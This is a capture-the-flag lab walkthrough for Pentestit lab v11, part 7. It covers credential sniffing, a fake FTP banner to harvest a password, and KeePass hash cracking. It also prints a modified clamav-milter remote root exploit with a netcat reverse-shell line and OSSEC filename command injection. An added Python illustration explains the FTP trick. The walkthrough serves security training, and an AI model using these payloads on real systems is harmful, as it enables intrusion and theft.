Innogen security

Pentestit lab v11 Guide Part 7

Site 1 Admin Network:

Testing the aengineer ssh key against 192.168.10.1 proved successful and we can enumerate the host:

CONNECT – 192.168.11.1:

Bash history:

aengineer@tl11-192-168-10-1:~$ ls -al
total 28
drwxr-xr-x 3 aengineer aengineer 4096 Jul 12 14:50 .
drwxr-xr-x 4 root      root      4096 Jul 12 14:45 ..
-rw------- 1 aengineer aengineer 1256 Jul 12 16:53 .bash_history
-rw-r--r-- 1 aengineer aengineer  220 Jul 12 14:45 .bash_logout
-rw-r--r-- 1 aengineer aengineer 3515 Jul 12 14:45 .bashrc
-rw-r--r-- 1 aengineer aengineer  675 Jul 12 14:45 .profile
drwxr-xr-x 2 root      root      4096 Jul 12 14:50 .ssh
aengineer@tl11-192-168-10-1:~$ cat .bash
cat: .bash: No such file or directory
aengineer@tl11-192-168-10-1:~$ cat .bash_history 
cd
tcpdump
/usr/sbin/tcpdump
/usr/sbin/tcpdump --help
/usr/sbin/tcpdump -i eth0 -c 2
which gcc
which ruby
ruby -v
exit
cd /dev/shm/
wget 192.168.11.3/admin
env
set http_proxy=""
wget 192.168.11.3/admin
export http_proxy=""
wget 192.168.11.3/admin
wget 192.168.11.3/_admin/admin
wget 192.168.11.3/_admin/admin/
ruby -v 
ncat -klvp 7777
ncat -klvp 8888
ncat -klvp 9999
cd
exit
cd /dev/shm
ls
perl ngxbrt.pl 
perl ngxbrt.pl 192.168.11.3 80 192.168.10.1 8888
exit
ncat -klvp 8888
exit
cd /dev/shm
perl ngxbrt.pl 192.168.11.3 80 192.168.10.1 8888	Does not exist..
exit
cd /tmp
ls -la
cat ~/.bash_history 
clear
nc -nvlp 2020
/usr/sbin/tcpdump -i eth0 -A '' -w /var/tmp/dump.pcap
ls
exit
ls -la
nc -nvvlp 1234
exit
nmap -v -n -p- 192.168.10.2 -sV
nmap -v -n -p- 192.168.10.2 -sV -Pn
nmap -v -n -p- 192.168.10.2 -sV -Pn -T4
/usr/sbin/tcpdump 'src 192.168.10.2'
/usr/sbin/tcpdump 'src 192.168.10.2 || dst 192.168.10.2'
/usr/sbin/tcpdump 'src 192.168.10.5 || dst 192.168.10.5'
telnet 192.168.11.5
telnet 192.168.11.5 25
nc -nvlp 2020 here twice… will test this and leave for 10 mins..
sudo -l
ncat -klvp 8888
cd /dev/shm
cat ngxbrt.pl | nc 172.16.0.16 10100
ncat -klvp 8888
sudo -l
sudo tcpdump -A -i eth0 -s 1500 -c 1000 port not 22 and host not \
192.168.11.1 and port not 53 and host not 92.168.56.2 \
and not arp and port not 123
ls
aengineer@tl11-192-168-10-1:~$

Based on the bash history the following items are of interest:

  • /dev/shm/ngxbrt.pl – checking this shows the file no longer exists.
  • /usr/sbin/tcpdump -i eth0 -A '' -w /var/tmp/dump.pcap – a pcap of the network traffic was written to /var/tmp, so we can review it.
  • nc -nvlp 2020 – appears twice, so I check my notes and find port 2020 in the todo.txt we found on the Director machine:
    # m h  dom mon dow   comman1
    */3 * * * * su - checker -c 'python /home/checker/ftpclient.py 192.168.10.1 2020 5 user password' > /dev/null 2>&1


So this is noteworthy for potential use.

Grabbing the pcap:

As we found the pcap in the /var/tmp directory, we can use scp to pull the file down and view it in Wireshark:

scp -i adminnet.key aengineer@192.168.10.1:/var/tmp/dump.pcap dump.pcap

Again we navigate the pcap looking for FTP, HTTP or other connections that may contain information or cleartext passwords, and eventually, after a lot of noise in the pcap, we find a login request to 192.168.10.3:

We save this information off for later use.

The next item in the bash_history is the repeated netcat listener on port 2020 and the associated FTP command found in the todo.txt on the Director machine:

NC -NLVP 2020:

We fire up netcat on port 2020 and leave it running; remember the crontab states this will execute every three minutes: */3 * * * *
Eventually a hit is received, which times out. Referring back to the todo.txt script, we note that this is an FTP request which supplies the username and password via the script.

aengineer@tl11-192-168-10-1:~$ nc -nvlp 2020
listening on [any] 2020 ...
connect to [192.168.10.1] from (UNKNOWN) [192.168.11.4] 8224

Based on this I try a number of ways to grab the details from the connection request, and fail using echo commands:

NOTE: The following wiki was useful for this exercise:

https://en.wikipedia.org/wiki/List_of_FTP_server_return_codes

  • 220 – Service ready for new user.
  • 331 – User name okay, need password.

Failed Echo command:

aengineer@tl11-192-168-10-1:~$ echo "220 Welcome to Pwny FTP Service\n331 SPECIFY THE PASSWORD\r\n"|nc -nlvp 2020
listening on [any] 2020 ...
connect to [192.168.10.1] from (UNKNOWN) [192.168.11.4] 8228
USER ConnectToken

aengineer@tl11-192-168-10-1:~$ echo "220 Welcome to Pwny FTP Service\r\n331 SPECIFY THE PASSWORD"|nc -nlvp 2020
listening on [any] 2020 ...

aengineer@tl11-192-168-10-1:~$
aengineer@tl11-192-168-10-1:~$

As you can see I can grab the username, but the password response does not work, so I look at options and use printf as a further test, which produces the results required:

printf:

aengineer@tl11-192-168-10-1:~$ printf "220 Welcome to Pwny FTP Service\n331 SPECIFY THE PASSWORD\n"|nc -nlvp 2020
listening on [any] 2020 ...
connect to [192.168.10.1] from (UNKNOWN) [192.168.11.4] 1758
USER ConnectToken
PASS *************
aengineer@tl11-192-168-10-1:~$

As a further exercise I decide to test the same with Python print:

aengineer@tl11-192-168-10-1:~$ python -c 'print "220 Welcome to Pwny FTP Service\r\n331SPECIFY THE PASSWORD"' | nc -nlvp 2020
listening on [any] 2020 ...
connect to [192.168.10.1] from (UNKNOWN) [192.168.11.4] 8241
USER ConnectToken
PASS *************
aengineer@tl11-192-168-10-1:~$
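Why the echo attempts only ever yielded the USER line: bash's builtin echo (with its default settings) does not interpret \n, so both replies went out as a single line and a line-oriented FTP client never sees a 331. The following is an added illustration, not code from the original post; the client model is an assumption based on the RFC 959 reply format, not the lab's ftpclient.py.

```python
# Added example: model of a line-oriented FTP client reading the fake
# server's greeting. Assumption: the client behaves like a minimal RFC 959
# client (this is not the lab's ftpclient.py).

def parse_replies(data: bytes):
    """Return [(code, text)] for each complete reply line in data.
    A '220-' line opens a multi-line reply that ends at the next '220 ' line."""
    replies, pending = [], None
    for raw in data.split(b"\n"):
        line = raw.rstrip(b"\r")
        if len(line) < 3 or not line[:3].isdigit():
            continue                      # continuation text or junk
        code = int(line[:3])
        if line[3:4] == b"-":
            pending = code                # inside a multi-line reply
            continue
        if pending is not None and code != pending:
            continue
        pending = None
        replies.append((code, line[3:].strip().decode("latin-1")))
    return replies

def client_turns(server_bytes: bytes, user="user", password="pw"):
    """Commands the client would send in response to server_bytes."""
    replies = iter(parse_replies(server_bytes))
    sent = []
    code, _ = next(replies, (None, ""))
    if code != 220:
        return sent                       # no usable greeting: give up
    sent.append(f"USER {user}")
    code, _ = next(replies, (None, ""))
    if code == 331:                       # "need password"
        sent.append(f"PASS {password}")
    return sent

# Constructed server output, byte for byte what each command emits:
# bash's builtin echo leaves backslash sequences alone, so both replies
# land on one line; printf (and Python's print) turn \n into a real newline.
ECHO_OUT = b"220 Welcome to Pwny FTP Service\\n331 SPECIFY THE PASSWORD\\r\\n\n"
PRINTF_OUT = b"220 Welcome to Pwny FTP Service\n331 SPECIFY THE PASSWORD\n"
PRINT_OUT = b"220 Welcome to Pwny FTP Service\r\n331SPECIFY THE PASSWORD\n"

if __name__ == "__main__":
    for name, out in [("echo", ECHO_OUT), ("printf", PRINTF_OUT), ("print", PRINT_OUT)]:
        print(f"{name:7} -> {client_turns(out)}")
```

The echo bytes parse as one 220 reply, so the modelled client sends USER and then waits forever for a 331, exactly what the session above shows.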

We now have the CONNECT token and move on to the next hosts.

OWNCLOUD – 192.168.10.3:

As we have the credentials for 10.3 taken from the pcap file, we connect to port 80 (open according to the pcap) and log in to a document storage site:

We quickly see a my_store.kdbx file; checking this extension in Google shows it is a KeePass database file. I downloaded my_store and it appears Kali has a built-in tool just for this occasion.
The following link helped: https://www.rubydevices.com.au/blog/how-to-hack-keepass

keepass2john my_store.kdbx 
my_store:$keepass$*2*100000*222*
248fc218b7a47edeecd7a79e8587d5ff2c2221d98efd99837fe198ab0de8a82e*
330c91f974cb4df1d015bb15456d382db9c0c2f362909d5cd74f9b951fdee2f7*
828fb21b74cda7ae28a21473aaa62384*
f974657de86a3aca6faec09804d852a4df5fba5847e54d18e12bd81c33cce528*
7ca22042949d204e2f35aae52982946c101679205aa8db0ece2135cdb574170c

Taking this hash I fire it into hashcat and gain the OWNCLOUD KeePass password:

Hashcat: hashcat -m 13400 -a 0 -w 2 keepass.txt rockyou.txt 

We now have the password to unlock the KeePass file, which I then upload to the following site: https://app.keeweb.info/
This then produces the required TOKEN.

CLAMAV – 192.168.11.5:

When enumerating this host we find ssh and port 25 smtp open:

Nmap scan report for 192.168.11.5
Host is up (0.0019s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE
22/tcp open  ssh
25/tcp open  smtp

Checking port 25 returns the following:

tl11-192-168-11-5.mail-dev ESMTP Sendmail 8.14.4/8.14.4/Debian-8+deb8u2

After connecting to the SMTP port a few times I noticed a delay before the welcome message is returned. I was also confident about how this host is to be exploited, as its open ports and versions are exactly the same as a machine I dealt with during my OSCP, which was exploited using the clamav-milter exploit:
https://www.exploit-db.com/exploits/4761/

Because of the delay found above, "Exploit 4761" needs to be edited before use to allow for it: I merely added a ten-second sleep before the exploit commands are sent, and commented out the unrequired rcpt to lines:

### black-hole.pl
### Sendmail w/ clamav-milter Remote Root Exploit
### Copyright (c) 2007 Eliteboy
########################################################
use IO::Socket;

print "Sendmail w/ clamav-milter Remote Root Exploit\n";
print "Copyright (C) 2007 Eliteboy\n";

if ($#ARGV != 0) {print "Give me a host to connect.\n";exit;}

print "Attacking $ARGV[0]...\n";

$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => '25',
                              Proto    => 'tcp');

# SBridgens added this in to ensure correct response from the host!
print "sleeping 10 seconds to allow response";
sleep(10);

print $sock "ehlo you\r\n";
print $sock "mail from: <>\r\n";
print $sock "rcpt to: <nobody+\"|/bin/nc -e /bin/bash 192.168.10.1 8443\"@localhost>\r\n";
# print $sock "rcpt to: <nobody+\"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf\"@localhost>\r\n";
# print $sock "rcpt to: <nobody+\"|/etc/init.d/inetd restart\"@localhost>\r\n";
print $sock "data\r\n.\r\nquit\r\n";

while (<$sock>) {
        print;
}

# milw0rm.com [2007-12-21]

Connecting to our admin network machine (10.1) as aengineer, we start our nc listener, fire off the clamav-milter exploit, and immediate success is returned:

Now that we have a shell we begin to enumerate the host; a Linux privilege-check script is uploaded and executed to speed up this process. After reading its output multiple times I eventually question the following lines, which show the user accounts and running processes:

[*] ENUMERATING USER AND ENVIRONMENTAL INFO...
[+] All users
ossec:x:1001:1001::/var/ossec:/bin/false
ossecm:x:1002:1001::/var/ossec:/bin/false
ossecr:x:1003:1001::/var/ossec:/bin/false

[+] Current processes

ossec 578 12:14 0:00 /var/ossec/bin/ossec-analysisd
ossec 596 12:14 0:00 /var/ossec/bin/ossec-monitord

[*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER..
root 588 12:14 0:00 /var/ossec/bin/ossec-logcollector
root 591 12:14 0:00 /var/ossec/bin/ossec-syscheckd

Investigating the user accounts found, a check in Google leads to OSSEC:
https://en.wikipedia.org/wiki/OSSEC

Looking at exploits for OSSEC returns the following exploit-db post:

https://www.exploit-db.com/exploits/37265/

It took me a moment or two to actually get the point of this exploit, which was very clear in the description (facepalm):

Above, on line 258, the system() call is used to shell out to the
system’s “diff” command. The raw filename is passed in as an argument
which presents an attacker with the possibility to run arbitrary code.

From many exploits we know that on Linux we can, in some cases, present a filename containing a system command and get the output or even a shell. As we need to read the token file held in the /root directory, we will create files whose names change the permissions of the root directory, and then read the token file within.
NOTE: This one took quite some time to get right, because the diff process runs periodically. I tried things such as cat commands but failed to get the output, so chmod seemed to be the best way forward.

touch "a-\$(chmod 777 root)"
touch "b-\$(chmod 777 root)"
touch "c-\$(chmod 777 root)"
/bin/sleep 3
echo "give me the token" > a-*
/bin/sleep 3
echo "give me the token nooow" > b-*
/bin/sleep 3
echo "One more for good luck" > c-*
ls -al /root

clamav@tl11-192-168-11-5:~$ ls -al /root
ls -al /root
ls: cannot open directory /root: Permission denied
clamav@tl11-192-168-11-5:~$ touch "a-\$(chmod 777 root)"
touch "b-\$(chmod 777 root)"
touch "c-\$(chmod 777 root)"
/bin/sleep 3
echo "give me the token" > a-*
/bin/sleep 3
echo "give me the token nooow" > b-*
/bin/sleep 3
echo "One more for good luck" > c-*
ls -al /roottouch "a-\$(chmod 777 root)"
clamav@tl11-192-168-11-5:~$ touch "b-\$(chmod 777 root)"
clamav@tl11-192-168-11-5:~$ touch "c-\$(chmod 777 root)"
clamav@tl11-192-168-11-5:~$ /bin/sleep 3
clamav@tl11-192-168-11-5:~$ echo "give me the token" > a-*
clamav@tl11-192-168-11-5:~$ /bin/sleep 3
clamav@tl11-192-168-11-5:~$ echo "give me the token nooow" > b-*
clamav@tl11-192-168-11-5:~$ /bin/sleep 3
clamav@tl11-192-168-11-5:~$ echo "One more for good luck" > c-*
clamav@tl11-192-168-11-5:~$ 
ls -al /root
total 80
drwxrwxrwx  5 root root  4096 Jul 12 16:39 .
drwxr-xr-x 22 root root  4096 Apr  1 22:18 ..
drwx------  2 root root  4096 Nov 25  2016 .aptitude
-rw-------  1 root root  7559 Jul 12 16:40 .bash_history
-rw-r--r--  1 root root   674 Sep  3  2016 .bashrc
drwx------  3 root root  4096 May  1  2015 .config
-rw-------  1 root root    51 Apr 20 21:44 .lesshst
-rw-------  1 root root   407 Jul  4 21:36 .nano_history
-rw-r--r--  1 root root   140 Nov 19  2007 .profile
-rw-------  1 root root  1024 Apr 20 22:17 .rnd
-rw-r--r--  1 root root    66 Apr 21 12:56 .selected_editor
drwxr-xr-x  2 root root  4096 Jul 12 16:39 .ssh
-rw-------  1 root root 11611 Jul 12 16:39 .viminfo
-rwxr-xr-x  1 root root    38 Nov  5  2014 ipt.sh
-rwx------  1 root root   665 Jun 24 11:40 process_checker_mail.sh
-rwx------  1 root root   459 Apr 21 12:55 process_checker_ossec.sh
-rw-r--r--  1 root root    23 Jun 30 18:08 token
clamav@tl11-192-168-11-5:~$ 
clamav@tl11-192-168-11-5:~$ cat /root/token
cat /root/token
A**********************
clamav@tl11-192-168-11-5:~$

Now for the final system: access control…

PART 8
